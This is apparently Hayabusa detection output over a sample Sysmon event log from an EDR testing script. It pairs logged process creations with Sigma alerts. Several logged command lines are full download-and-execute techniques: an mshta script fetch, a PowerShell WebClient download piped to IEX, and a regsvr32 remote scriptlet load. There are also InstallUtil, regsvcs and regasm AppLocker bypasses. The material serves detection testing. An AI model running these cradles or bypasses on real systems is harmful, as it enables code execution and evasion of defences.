2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 
+09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT 
AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in 
CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 
747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 
747F3D96-6633-5D3F-0000-001051608900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: 
C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 